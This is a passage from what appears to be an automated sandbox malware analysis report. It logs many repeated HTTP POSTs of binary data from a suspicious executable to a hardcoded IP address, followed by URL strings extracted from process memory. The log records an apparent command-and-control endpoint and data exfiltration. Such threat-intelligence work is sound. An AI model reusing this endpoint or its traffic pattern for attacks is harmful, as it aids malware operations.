                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2140Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2164Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continueConnection: Keep-Alive
                          Source: unknownHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.H
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.Hjj
                          Source: powershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic4%
                          Source: powershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic8
                          Source: powershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micJ
                          Source: powershell.exe, 00000006.00000002.2581210774.0000027760BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                          Source: svchost.exe, 00000013.00000002.2903834268.000001F814200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: powershell.exe, 00000001.00000002.2513469202.000001BD9BE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: powershell.exe, 00000001.00000002.2653821923.000001BDA3F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                          Source: powershell.exe, 00000001.00000002.2676516036.000001BDA4085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, 